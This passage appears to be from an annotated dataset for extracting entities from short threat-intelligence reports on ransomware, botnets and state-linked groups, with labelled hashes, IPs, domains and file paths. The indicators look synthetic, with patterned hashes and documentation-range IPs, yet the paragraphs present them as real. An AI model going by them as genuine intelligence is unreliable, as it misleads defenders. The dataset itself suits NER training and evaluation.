C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "THREAT_ACTOR: Cozy Bear": [[21, 30]], "THREAT_ACTOR: Midnight Blizzard": [[59, 76]], "ORGANIZATION: Microsoft": [[46, 55]], "TOOL: rundll32.exe": [[260, 272]], "HASH: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "FILEPATH: C:\\Users\\Public\\Documents\\config.dll": [[380, 416]], "DOMAIN: auth-microsoft365.com": [[453, 474]], "DOMAIN: login-sharepoint.org": [[479, 499]], "URL: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[628, 694]], "IP_ADDRESS: 194.58.112.43": [[738, 751]], "IP_ADDRESS: 89.34.27.199": [[756, 768]], "MALWARE: Brute Ratel C4": [[794, 808]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe": [[814, 859]]}, "info": {"id": "malware_00016", "source": "malware_reports"}} |
| {"text": "The Medusa ransomware group emerged in 2023 and operates a ransomware-as-a-service model. CISA released advisory AA25-071A documenting Medusa's tactics. The ransomware binary typically has filename gaze.exe or medusa_locker.exe and is deployed after initial access via exposed RDP services or phishing. Medusa uses the legitimate tool PsExec for lateral movement and deploys Advanced IP Scanner for network reconnaissance. The ransomware appends the .MEDUSA extension to encrypted files and drops a ransom note named !!!READ_ME_MEDUSA!!!.txt. Known C2 infrastructure includes the domains medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion and medusa-blog.xyz. Observed IP addresses used for data exfiltration: 45.8.146.23, 193.233.133.58, and 91.92.242.87. File hashes associated with Medusa include SHA256 c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2 and MD5 b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7.", "spans": {"MALWARE: Medusa": [[4, 10], [135, 141], [303, 309], [796, 802]], "ORGANIZATION: CISA": [[90, 94]], "FILEPATH: gaze.exe": [[198, 206]], "FILEPATH: medusa_locker.exe": [[210, 227]], "TOOL: PsExec": [[335, 341]], "TOOL: Advanced IP Scanner": [[375, 394]], "FILEPATH: !!!READ_ME_MEDUSA!!!.txt": [[517, 541]], "DOMAIN: medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion": [[588, 649]], "DOMAIN: medusa-blog.xyz": [[654, 669]], "IP_ADDRESS: 45.8.146.23": [[721, 732]], "IP_ADDRESS: 193.233.133.58": [[734, 748]], "IP_ADDRESS: 91.92.242.87": [[754, 766]], "HASH: c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2": [[818, 882]], "HASH: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7": [[891, 923]]}, "info": {"id": "malware_00017", "source": "malware_reports"}} |
| {"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203.0.113.42, 198.51.100.73, and 192.0.2.156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203.0.113.42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. Additional C2 domains include update-service-ms.com and cdn-office365.net. Associated email addresses used in phishing: invoice@update-service-ms.com and admin@cdn-office365.net.", "spans": {"MALWARE: QakBot": [[41, 47], [476, 482]], "MALWARE: Qbot": [[63, 67]], "MALWARE: Pinkslipbot": [[72, 83]], "ORGANIZATION: FBI": [[12, 15]], "HASH: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "IP_ADDRESS: 203.0.113.42": [[268, 280]], "IP_ADDRESS: 198.51.100.73": [[282, 295]], "IP_ADDRESS: 192.0.2.156": [[301, 312]], "SYSTEM: OneNote": [[357, 364]], "TOOL: PowerShell": [[384, 394]], "URL: hxxp://203.0.113.42/updates/kb5034441.dll": [[433, 474]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll": [[550, 600]], "SYSTEM: wermgr.exe": [[646, 656]], "SYSTEM: explorer.exe": [[661, 673]], "DOMAIN: update-service-ms.com": [[717, 738]], "DOMAIN: cdn-office365.net": [[743, 760]], "EMAIL: invoice@update-service-ms.com": [[807, 836]], "EMAIL: admin@cdn-office365.net": [[841, 864]]}, "info": {"id": "malware_00018", "source": "malware_reports"}} |
| {"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172.16.45.3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185.174.137.92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite.onion.", "spans": {"MALWARE: BlackCat": [[4, 12]], "MALWARE: ALPHV": [[41, 46]], "SYSTEM: VMware ESXi": [[89, 100], [310, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187]], "CVE_ID: CVE-2024-37085": [[292, 306]], "IP_ADDRESS: 172.16.45.3": [[409, 420]], "FILEPATH: /tmp/esxi_encrypt": [[452, 469]], "FILEPATH: /tmp/.config.json": [[514, 531]], "TOOL: rclone": [[577, 583]], "IP_ADDRESS: 185.174.137.92": [[635, 649]], "HASH: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[677, 741]], "HASH: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[746, 810]], "DOMAIN: alphv-paymentsite.onion": [[846, 869]]}, "info": {"id": "malware_00019", "source": "malware_reports"}} |
| {"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader.chainfund.io and exchange-data.cryptonode.org on port 8443. Malicious payloads were hosted at hxxps://api-trader.chainfund.io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104.168.174.22 and 107.189.10.143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes.io.", "spans": {"THREAT_ACTOR: Lazarus Group": [[0, 13]], "THREAT_ACTOR: Hidden Cobra": [[29, 41]], "ORGANIZATION: FBI": [[152, 155]], "ORGANIZATION: CISA": [[160, 164]], "HASH: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "HASH: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "DOMAIN: api-trader.chainfund.io": [[491, 514]], "DOMAIN: exchange-data.cryptonode.org": [[519, 547]], "URL: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[596, 651]], "FILEPATH: /Library/Application Support/.daemon/updater": [[683, 727]], "FILEPATH: ~/Library/LaunchAgents/com.apple.update.plist": [[732, 777]], "IP_ADDRESS: 104.168.174.22": [[821, 835]], "IP_ADDRESS: 107.189.10.143": [[840, 854]], "EMAIL: recruit@hrnodes.io": [[945, 963]], "SYSTEM: macOS": [[781, 786]], "SYSTEM: LinkedIn": [[899, 907]]}, "info": {"id": "malware_00020", "source": "malware_reports"}} |
| {"text": "Volt Typhoon, a Chinese state-sponsored threat actor, targeted U.S. critical infrastructure using living-off-the-land techniques. Microsoft and the Five Eyes intelligence alliance published advisories. The group gained initial access through Fortinet FortiGuard devices exploiting CVE-2024-21762. Post-compromise activity relied on netsh, ntdsutil, PowerShell, and wmic for discovery and credential access. The attackers used compromised SOHO routers at IP addresses 24.199.247.13, 67.230.163.214, and 162.245.191.78 as operational relay infrastructure. Web shells were deployed to C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx. Lateral movement used PsExec and Windows Management Instrumentation. Exfiltrated data was staged at C:\\Windows\\Temp\\cab_extract\\ before transfer. No custom malware was deployed; the group relied entirely on built-in Windows tools including cmd.exe, certutil, and bitsadmin.", "spans": {"THREAT_ACTOR: Volt Typhoon": [[0, 12]], "ORGANIZATION: Microsoft": [[130, 139]], "SYSTEM: Fortinet FortiGuard": [[242, 261]], "CVE_ID: CVE-2024-21762": [[281, 295]], "TOOL: netsh": [[332, 337]], "TOOL: ntdsutil": [[339, 347]], "TOOL: PowerShell": [[349, 359]], "TOOL: wmic": [[365, 369]], "IP_ADDRESS: 24.199.247.13": [[467, 480]], "IP_ADDRESS: 67.230.163.214": [[482, 496]], "IP_ADDRESS: 162.245.191.78": [[502, 516]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx": [[582, 636]], "TOOL: PsExec": [[660, 666]], "FILEPATH: C:\\Windows\\Temp\\cab_extract\\": [[738, 766]], "TOOL: cmd.exe": [[878, 885]], "TOOL: certutil": [[887, 895]], "TOOL: bitsadmin": [[901, 910]], "SYSTEM: Windows": [[671, 678], [854, 861]]}, "info": {"id": "malware_00021", "source": "malware_reports"}} |
| {"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91.245.228.56 and 176.57.215.92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10.25.100.1 and 10.25.100.2.", "spans": {"THREAT_ACTOR: Sandworm": [[0, 8]], "ORGANIZATION: GRU": [[33, 36]], "THREAT_ACTOR: Seashell Blizzard": [[76, 93]], "ORGANIZATION: Microsoft": [[63, 72]], "MALWARE: Industroyer2": [[180, 192], [682, 694]], "MALWARE: CaddyWiper": [[256, 266]], "HASH: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "SYSTEM: Windows": [[360, 367]], "MALWARE: OrcShred": [[409, 417]], "SYSTEM: Linux": [[428, 433]], "SYSTEM: Solaris": [[438, 445]], "HASH: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "IP_ADDRESS: 91.245.228.56": [[562, 575]], "IP_ADDRESS: 176.57.215.92": [[580, 593]], "FILEPATH: /var/tmp/.update.sh": [[630, 649]], "FILEPATH: /opt/oracle/extproc.sh": [[654, 676]], "IP_ADDRESS: 10.25.100.1": [[808, 819]], "IP_ADDRESS: 10.25.100.2": [[824, 835]]}, "info": {"id": "malware_00022", "source": "malware_reports"}} |
| {"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates.com at IP 185.219.52.229. Additional C2 domains: api-gateway-service.com and storage-cloud-backup.net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45.129.14.88 and 91.195.240.117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: Carbanak Group": [[20, 34]], "CVE_ID: CVE-2023-36884": [[189, 203]], "SYSTEM: Microsoft Office": [[207, 223]], "MALWARE: Lizar": [[263, 268], [723, 728]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js": [[285, 325]], "DOMAIN: cdn-static-updates.com": [[356, 378]], "IP_ADDRESS: 185.219.52.229": [[385, 399]], "DOMAIN: api-gateway-service.com": [[424, 447]], "DOMAIN: storage-cloud-backup.net": [[452, 476]], "MALWARE: Carbanak": [[502, 510]], "HASH: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[528, 592]], "TOOL: BloodHound": [[603, 613]], "MALWARE: Cobalt Strike": [[651, 664]], "IP_ADDRESS: 45.129.14.88": [[686, 698]], "IP_ADDRESS: 91.195.240.117": [[703, 717]]}, "info": {"id": "malware_00023", "source": "malware_reports"}} |
| {"text": "Akira ransomware emerged in March 2023 and has targeted over 250 organizations globally. The ransomware group maintains a Tor-based leak site at akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion. Initial access is commonly gained through Cisco VPN appliances exploiting CVE-2023-20269. The ransomware binary (SHA256 hash f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3) encrypts files with the .akira extension. The group uses AnyDesk and RustDesk for remote access, WinSCP for data exfiltration, and Mimikatz for credential dumping. Ransomware deployment scripts are staged at C:\\Windows\\Temp\\deploy.bat and network shares are encrypted via C:\\Users\\Public\\w.exe. C2 IP addresses: 89.105.198.42, 194.26.135.119, and 45.227.255.13. Exfiltrated data is uploaded to mega.nz and transferred via rclone. The decryptor for paying victims is hosted at hxxps://akiradecrypt.org/recover/index.html.", "spans": {"MALWARE: Akira": [[0, 5]], "DOMAIN: akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion": [[145, 207]], "SYSTEM: Cisco VPN": [[251, 260]], "CVE_ID: CVE-2023-20269": [[283, 297]], "HASH: f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3": [[334, 398]], "TOOL: AnyDesk": [[457, 464]], "TOOL: RustDesk": [[469, 477]], "TOOL: WinSCP": [[497, 503]], "TOOL: Mimikatz": [[531, 539]], "FILEPATH: C:\\Windows\\Temp\\deploy.bat": [[608, 634]], "FILEPATH: C:\\Users\\Public\\w.exe": [[672, 693]], "IP_ADDRESS: 89.105.198.42": [[712, 725]], "IP_ADDRESS: 194.26.135.119": [[727, 741]], "IP_ADDRESS: 45.227.255.13": [[747, 760]], "TOOL: rclone": [[822, 828]], "URL: hxxps://akiradecrypt.org/recover/index.html": [[876, 919]]}, "info": {"id": "malware_00024", "source": "malware_reports"}} |
| {"text": "Emotet returned in November 2024 after a prolonged dormancy period following the January 2021 takedown coordinated by Europol. The new variant with SHA256 hash b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 is distributed via malicious Excel files with XLM macros. The malware drops its payload to C:\\Windows\\SysWOW64\\randomname.dll and registers persistence through a Windows service. C2 communications use HTTP POST requests to compromised WordPress sites at 103.75.201.2, 45.76.176.10, 104.131.62.48, 158.69.222.101, and 37.44.244.177. The botnet uses a tiered architecture with Epoch 4 and Epoch 5 infrastructure. Key C2 domains include cdn-update-service.com, api-metrics-data.org, and telemetry-reports.net. The malware was observed dropping secondary payloads including SystemBC proxy bot and Bumblebee loader.", "spans": {"MALWARE: Emotet": [[0, 6]], "ORGANIZATION: Europol": [[118, 125]], "HASH: b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1": [[160, 224]], "FILEPATH: C:\\Windows\\SysWOW64\\randomname.dll": [[316, 350]], "IP_ADDRESS: 103.75.201.2": [[479, 491]], "IP_ADDRESS: 45.76.176.10": [[493, 505]], "IP_ADDRESS: 104.131.62.48": [[507, 520]], "IP_ADDRESS: 158.69.222.101": [[522, 536]], "IP_ADDRESS: 37.44.244.177": [[542, 555]], "DOMAIN: cdn-update-service.com": [[659, 681]], "DOMAIN: api-metrics-data.org": [[683, 703]], "DOMAIN: telemetry-reports.net": [[709, 730]], "MALWARE: SystemBC": [[795, 803]], "MALWARE: Bumblebee": [[818, 827]], "SYSTEM: WordPress": [[460, 469]]}, "info": {"id": "malware_00025", "source": "malware_reports"}} |